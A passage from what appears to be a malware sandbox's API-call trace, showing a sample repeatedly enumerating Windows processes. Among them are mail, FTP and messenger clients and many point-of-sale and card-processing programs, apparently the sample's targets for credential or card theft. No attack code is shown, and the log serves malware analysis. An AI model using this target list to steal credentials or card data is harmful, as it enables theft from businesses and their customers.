| out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0191.443] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0191.444] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0191.446] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0191.448] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0191.450] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0191.454] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0191.456] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0191.457] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0191.459] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0191.461] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0191.462] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0191.464] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0191.468] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0191.470] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0191.471] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0191.473] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0191.474] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0191.476] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0191.478] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0191.485] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0191.487] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0191.489] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0191.490] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0191.492] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0191.493] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0191.495] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0191.499] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0191.501] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0191.502] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.504] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.505] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.507] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0191.511] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0191.514] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0191.515] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0191.517] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0191.518] CloseHandle (hObject=0x15a0) returned 1 [0191.518] Sleep (dwMilliseconds=0x64) [0191.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x15a0 [0191.538] Process32First (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.540] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0191.541] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0191.543] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.549] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0191.551] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0191.553] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0191.554] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0191.556] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0191.557] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.559] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.563] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0191.565] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.567] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.569] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.571] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.574] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.578] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.580] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.582] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0191.583] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0191.585] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0191.586] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.588] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.589] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0191.595] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0191.596] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0191.598] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.599] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0191.601] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.602] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.604] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0191.609] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0191.610] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0191.612] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0191.614] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0191.616] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0191.617] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0191.619] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0191.620] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0191.625] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0191.627] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0191.629] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0191.630] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0191.632] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0191.633] Process32Next (in: hSnapshot=0x15a0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 